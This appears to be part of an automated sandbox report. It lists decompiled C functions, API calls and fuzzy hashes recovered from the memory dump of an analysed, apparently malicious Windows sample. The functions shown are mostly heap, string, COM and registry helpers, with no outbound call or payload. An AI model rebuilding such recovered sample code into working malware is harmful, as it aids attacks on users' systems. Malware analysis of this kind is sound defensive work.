                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F7004, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 50%
                                                                                  			E033F7004(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x33fd230; // 0x2b2a5a8
				_t2 = _t42 + 0x33fe468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x33fd230; // 0x2b2a5a8
					_t6 = _t45 + 0x33fe488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x33fd230; // 0x2b2a5a8
							_t30 = _v8;
							_t12 = _t48 + 0x33fe478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                                                                  0x033f7010
                                                                                  0x033f7011
                                                                                  0x033f7017
                                                                                  0x033f701e
                                                                                  0x033f7020
                                                                                  0x033f7024
                                                                                  0x033f7028
                                                                                  0x033f702a
                                                                                  0x033f7033
                                                                                  0x033f7039
                                                                                  0x033f7041
                                                                                  0x033f7043
                                                                                  0x033f7047
                                                                                  0x033f7049
                                                                                  0x033f7056
                                                                                  0x033f705a
                                                                                  0x033f705f
                                                                                  0x033f7065
                                                                                  0x033f706a
                                                                                  0x033f7072
                                                                                  0x033f7074
                                                                                  0x033f7076
                                                                                  0x033f707c
                                                                                  0x033f707c
                                                                                  0x033f707f
                                                                                  0x033f7085
                                                                                  0x033f7085
                                                                                  0x033f7088
                                                                                  0x033f708e
                                                                                  0x033f708e
                                                                                  0x033f7095

                                                                                  APIs
                                                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 033F7041
                                                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 033F7072
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Interface_ProxyQueryUnknown_
                                                                                  • String ID:
                                                                                  • API String ID: 2522245112-0
                                                                                  • Opcode ID: 3de7b279bcdc30b377eb2017a39af46659f0172f07a6ebf93df2060b87d24a09
                                                                                  • Instruction ID: 362d1a2fe7d41c7b9d0ae985cedde58c684f2ff0bd06dc918df2bbec4d0f30d6
                                                                                  • Opcode Fuzzy Hash: 3de7b279bcdc30b377eb2017a39af46659f0172f07a6ebf93df2060b87d24a09
                                                                                  • Instruction Fuzzy Hash: 44212C75A0061AAFCB00DBA4C898D9AB779FF88704B548698ED05DB358D731EE41CBE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F9F53, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(033F5886), ref: 033F9F6D
                                                                                    • Part of subcall function 033F75D9: SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F9FAD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: String$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 986138563-0
                                                                                  • Opcode ID: fab7c986fc2423cb88eaa1168a5c1ba6aba4d5843829564fdd7a7917d5d45d49
                                                                                  • Instruction ID: 35dafb90764badcff5e92308100adc7a062b02bd6d2546d11c7eba2fa0edfd7a
                                                                                  • Opcode Fuzzy Hash: fab7c986fc2423cb88eaa1168a5c1ba6aba4d5843829564fdd7a7917d5d45d49
                                                                                  • Instruction Fuzzy Hash: BB014F7651020EBFDB519F98C94899FBBB9EF44310B410121FE05A6160E774DA15CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033FA5D1, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement( &E033FD1F4) == 0) {
						E033F310C();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement( &E033FD1F4) == 1) {
						_t10 = E033F8714(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                                                                  0x033fa5d8
                                                                                  0x033fa5d9
                                                                                  0x033fa5dc
                                                                                  0x033fa60e
                                                                                  0x033fa610
                                                                                  0x033fa610
                                                                                  0x033fa5de
                                                                                  0x033fa5df
                                                                                  0x033fa5f4
                                                                                  0x033fa5fb
                                                                                  0x033fa5fd
                                                                                  0x033fa5fd
                                                                                  0x033fa5fb
                                                                                  0x033fa5df
                                                                                  0x033fa618

                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(033FD1F4), ref: 033FA5E6
                                                                                    • Part of subcall function 033F8714: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 033F8729
                                                                                  • InterlockedDecrement.KERNEL32(033FD1F4), ref: 033FA606
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                  • String ID:
                                                                                  • API String ID: 3834848776-0
                                                                                  • Opcode ID: fdb0160a1994e2f06559e444c154e2c9df1e238d7158b6ca04f18079feb83d9b
                                                                                  • Instruction ID: 2b0c9ed3b5692bc9176f46f0342560e9036c891782e579ff26fbb861ba41ed36
                                                                                  • Opcode Fuzzy Hash: fdb0160a1994e2f06559e444c154e2c9df1e238d7158b6ca04f18079feb83d9b
                                                                                  • Instruction Fuzzy Hash: E1E04F252842225FC665F6A58CCC76EFE5CAF00F88FC44164F789D9036D610C4918EA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F8963, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 92%
                                                                                  			E033F8963(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x33fd1f0, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                                                                  0x033f8968
                                                                                  0x033f896d
                                                                                  0x033f897b
                                                                                  0x033f8981
                                                                                  0x033f8985
                                                                                  0x033f89f6
                                                                                  0x033f8987
                                                                                  0x033f898b
                                                                                  0x033f898e
                                                                                  0x033f8991
                                                                                  0x033f8998
                                                                                  0x033f8999
                                                                                  0x033f899a
                                                                                  0x033f899e
                                                                                  0x033f89a1
                                                                                  0x033f89a8
                                                                                  0x033f89ae
                                                                                  0x033f89af
                                                                                  0x033f89af
                                                                                  0x033f89b6
                                                                                  0x033f89b7
                                                                                  0x033f89b8
                                                                                  0x033f89bc
                                                                                  0x033f89c8
                                                                                  0x033f89ce
                                                                                  0x033f89cf
                                                                                  0x033f89cf
                                                                                  0x033f89d1
                                                                                  0x033f89d7
                                                                                  0x033f89d9
                                                                                  0x033f89de
                                                                                  0x033f89df
                                                                                  0x033f89df
                                                                                  0x033f89e5
                                                                                  0x033f89ee
                                                                                  0x033f89f0
                                                                                  0x033f89f3
                                                                                  0x033f8a02

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 033F897B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 6d9bb09ba5309e05f62ab59e2916bfeae1138f5c86c8e85df4f3f13921bd4b1a
                                                                                  • Instruction ID: 84bc1b7e21d76399f5c181403f525f6e66ad3b958bcf0dd099d42f307a19b247
                                                                                  • Opcode Fuzzy Hash: 6d9bb09ba5309e05f62ab59e2916bfeae1138f5c86c8e85df4f3f13921bd4b1a
                                                                                  • Instruction Fuzzy Hash: 7A1129312853459FEB09CF2DC891BEABBA9DB53318F58408EE5808F392C277850BC760
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F3160, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 34%
                                                                                  			E033F3160(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x33fd230; // 0x2b2a5a8
				_t4 = _t15 + 0x33fe394; // 0x5f2893c
				_t20 = _t4;
				_t6 = _t15 + 0x33fe124; // 0x650047
				_t17 = E033F75D9(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E033F7404(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                  0x033f316a
                                                                                  0x033f316c
                                                                                  0x033f3173
                                                                                  0x033f3174
                                                                                  0x033f3175
                                                                                  0x033f3176
                                                                                  0x033f317c
                                                                                  0x033f3181
                                                                                  0x033f3181
                                                                                  0x033f318b
                                                                                  0x033f319d
                                                                                  0x033f31a4
                                                                                  0x033f31d3
                                                                                  0x033f31a6
                                                                                  0x033f31ab
                                                                                  0x033f31d0
                                                                                  0x033f31ad
                                                                                  0x033f31b0
                                                                                  0x033f31b7
                                                                                  0x033f31c2
                                                                                  0x033f31b9
                                                                                  0x033f31bc
                                                                                  0x033f31bc
                                                                                  0x033f31c6
                                                                                  0x033f31c6
                                                                                  0x033f31ab
                                                                                  0x033f31da

                                                                                  APIs
                                                                                    • Part of subcall function 033F75D9: SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                    • Part of subcall function 033F7404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,033F76F9,004F0053,00000000,?), ref: 033F740D
                                                                                    • Part of subcall function 033F7404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,033F76F9,004F0053,00000000,?), ref: 033F7437
                                                                                    • Part of subcall function 033F7404: memset.NTDLL ref: 033F744B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F31C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 397948122-0
                                                                                  • Opcode ID: 5d9c82e3b99d2910f6bf936a10ddb9f6f921306d3ce4ee2ff2d9f2bb16ceda16
                                                                                  • Instruction ID: e2a0b2e789f7a77c92b7f4bb78a1db3351ace34c73cda7b9ccd7e0951579beed
                                                                                  • Opcode Fuzzy Hash: 5d9c82e3b99d2910f6bf936a10ddb9f6f921306d3ce4ee2ff2d9f2bb16ceda16
                                                                                  • Instruction Fuzzy Hash: 96015E36500119BFDB11FF98CC85DAEBBB9FB05760F800965EA01E7060E3709951C7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F726B, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 89%
                                                                                  			E033F726B(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E033F8963(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x33fd230; // 0x2b2a5a8
						_t9 = _t17 + 0x33fea08; // 0x444f4340
						_t20 = E033F1650( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x33fd1f0, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                                                                  0x033f726e
                                                                                  0x033f7274
                                                                                  0x033f72cb
                                                                                  0x033f727a
                                                                                  0x033f7285
                                                                                  0x033f728a
                                                                                  0x033f728e
                                                                                  0x033f729b
                                                                                  0x033f72a3
                                                                                  0x033f72af
                                                                                  0x033f72b7
                                                                                  0x033f72c1
                                                                                  0x033f72c1
                                                                                  0x033f728e
                                                                                  0x033f72d0

                                                                                  APIs
                                                                                    • Part of subcall function 033F8963: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 033F897B
                                                                                    • Part of subcall function 033F1650: lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 033F1684
                                                                                    • Part of subcall function 033F1650: StrStrA.SHLWAPI(00000000,?), ref: 033F1691
                                                                                    • Part of subcall function 033F1650: RtlAllocateHeap.NTDLL(00000000,?), ref: 033F16B0
                                                                                    • Part of subcall function 033F1650: memcpy.NTDLL(00000000,0000000B,0000000B), ref: 033F16C4
                                                                                    • Part of subcall function 033F1650: memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16D3
                                                                                    • Part of subcall function 033F1650: memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16EE
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,033F8A8E), ref: 033F72C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Heapmemcpy$Allocate$Freelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 4098479933-0
                                                                                  • Opcode ID: 97ebbca6fe7e27d86a2d8b277a8c8aeb2a1b384360b7e5b19bb456ff480413c9
                                                                                  • Instruction ID: 38c8c1fc6783f3e489317ccf5041242ddafb97bf2474679adcc911b166669c95
                                                                                  • Opcode Fuzzy Hash: 97ebbca6fe7e27d86a2d8b277a8c8aeb2a1b384360b7e5b19bb456ff480413c9
                                                                                  • Instruction Fuzzy Hash: 1A01F436100109FFCB11DF08CC80FAABBBDEB54390F544129FB458A164E732EA44DB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F75C4, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F75C4(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x33fd1f0, 0, _a4); // executed
				return _t2;
			}




                                                                                  0x033f75d0
                                                                                  0x033f75d6

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: a0f6df96fce7d48d51dd9a490eb8ddb03d6c65a4ca52887d6a66224b45244b4e
                                                                                  • Instruction ID: b6d5bd25f59c459a9ccac8957f8bea067cdbe4fa7dd3d456cbb0eaeb314708bb
                                                                                  • Opcode Fuzzy Hash: a0f6df96fce7d48d51dd9a490eb8ddb03d6c65a4ca52887d6a66224b45244b4e
                                                                                  • Instruction Fuzzy Hash: B0B01231440101FFDA017B10DD48F057B25F754700F408010F2000406CC2314420FB14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4C31, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4C31(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x33fd1f0, 0, _a4); // executed
				return _t2;
			}




                                                                                  0x033f4c3d
                                                                                  0x033f4c43

                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 9b52ed4c010d64943d7341dbb9bfc7a919d88bb76c86dba9647a3e37cd689d3d
                                                                                  • Instruction ID: 8ab775528d54053dd75180823dcbd3c2da875591402a09858c8be186cbffa202
                                                                                  • Opcode Fuzzy Hash: 9b52ed4c010d64943d7341dbb9bfc7a919d88bb76c86dba9647a3e37cd689d3d
                                                                                  • Instruction Fuzzy Hash: 78B01231040101EFCA117B00DD48F05BB25F750704F504410B2400406C82314420FB08
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F81E9, Relevance: 1.3, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F81E9(void* __eax, void* __ecx, void* __edx, void* _a4, void** _a8, intOrPtr* _a12) {
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				int _v40;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void* _t40;
				void* _t45;
				void* _t54;
				void* _t56;
				int _t59;
				void* _t60;
				void* _t62;
				void* _t63;

				_t57 = __ecx;
				_t56 = _a4;
				_t59 = 0;
				_t60 = __eax;
				_v16 = 0;
				_v12 = 0;
				_a4 = 0;
				if(__eax <= 0x40) {
					L20:
					return _t59;
				}
				_t6 = _t60 - 0x40; // 0x33f3862
				_t40 = E033FA089(_a12, __ecx, __edx,  &_v72,  &_v16, _t56 + _t6);
				if(_t40 != 0) {
					goto L20;
				}
				_t61 = _t60 - 0x40;
				if(_v40 > _t60 - 0x40) {
					goto L20;
				}
				while( *((char*)(_t63 + _t40 - 0x34)) == 0) {
					_t40 = _t40 + 1;
					if(_t40 < 0x10) {
						continue;
					}
					_t59 = _v40;
					_t54 = E033F75C4(_t59);
					_t71 = _t54;
					_a4 = _t54;
					if(_t54 != 0) {
						_t59 = 0;
						L17:
						if(_t59 != 0) {
							goto L20;
						}
						L18:
						if(_a4 != 0) {
							E033F4C31(_a4);
						}
						goto L20;
					}
					memcpy(_t54, _t56, _t59);
					L7:
					_t62 = _a4;
					E033F6D45(_t57, _t71, _t62, _t59,  &_v32);
					if(_v32 != _v72 || _v28 != _v68 || _v24 != _v64 || _v20 != _v60) {
						L14:
						_t59 = 0;
						goto L18;
					} else {
						 *_a8 = _t62;
						goto L17;
					}
				}
				_t45 = E033FA83A(_t61, _t56,  &_a4,  &_v12,  &_v56, 0); // executed
				__eflags = _t45;
				if(_t45 != 0) {
					_t59 = _v12;
					goto L17;
				}
				_t59 = _v40;
				__eflags = _v12 - _t59;
				if(__eflags >= 0) {
					goto L7;
				}
				goto L14;
			}























                                                                                  0x033f81e9
                                                                                  0x033f81f0
                                                                                  0x033f81f5
                                                                                  0x033f81f7
                                                                                  0x033f81fc
                                                                                  0x033f81ff
                                                                                  0x033f8202
                                                                                  0x033f8205
                                                                                  0x033f82d0
                                                                                  0x033f82d6
                                                                                  0x033f82d6
                                                                                  0x033f820b
                                                                                  0x033f821b
                                                                                  0x033f8222
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f8228
                                                                                  0x033f822e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f8234
                                                                                  0x033f823b
                                                                                  0x033f823f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f8241
                                                                                  0x033f8245
                                                                                  0x033f824a
                                                                                  0x033f824c
                                                                                  0x033f824f
                                                                                  0x033f82b7
                                                                                  0x033f82be
                                                                                  0x033f82c0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f82c2
                                                                                  0x033f82c6
                                                                                  0x033f82cb
                                                                                  0x033f82cb
                                                                                  0x00000000
                                                                                  0x033f82c6
                                                                                  0x033f8254
                                                                                  0x033f825c
                                                                                  0x033f825c
                                                                                  0x033f8265
                                                                                  0x033f8270
                                                                                  0x033f82b3
                                                                                  0x033f82b3
                                                                                  0x00000000
                                                                                  0x033f828a
                                                                                  0x033f828d
                                                                                  0x00000000
                                                                                  0x033f828d
                                                                                  0x033f8270
                                                                                  0x033f82a2
                                                                                  0x033f82a7
                                                                                  0x033f82a9
                                                                                  0x033f82bb
                                                                                  0x00000000
                                                                                  0x033f82bb
                                                                                  0x033f82ab
                                                                                  0x033f82ae
                                                                                  0x033f82b1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000000,033F38A2,033F7BE6,033F7BE6,?,033F38A2,033F3862,033F38A2,?,033F38A2), ref: 033F8254
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3510742995-0
                                                                                  • Opcode ID: 0b4e236784037021541fb1e411d7099dd7a81a41d8dd6343a7fe4c299d759969
                                                                                  • Instruction ID: 87eaf685c5cc3d82ab9a089f2b9309713dfd75ec4c7043dbfbdf57dec6a715e2
                                                                                  • Opcode Fuzzy Hash: 0b4e236784037021541fb1e411d7099dd7a81a41d8dd6343a7fe4c299d759969
                                                                                  • Instruction Fuzzy Hash: 13312B76D01A08BFDF15DF99C9C0AEEBBBDAB44354F944061EA05EB210D630FA418BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4195, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4195(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E033F3160(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E033F51C4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x33fd1f0, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}







                                                                                  0x033f419d
                                                                                  0x033f41f2
                                                                                  0x033f41f7
                                                                                  0x033f419f
                                                                                  0x033f41b9
                                                                                  0x033f41bd
                                                                                  0x033f41c2
                                                                                  0x033f41c4
                                                                                  0x033f41d4
                                                                                  0x033f41e0
                                                                                  0x033f41c6
                                                                                  0x033f41c6
                                                                                  0x033f41c9
                                                                                  0x033f41ce
                                                                                  0x033f41ce
                                                                                  0x033f41c4
                                                                                  0x033f41bd
                                                                                  0x033f41fd

                                                                                  APIs
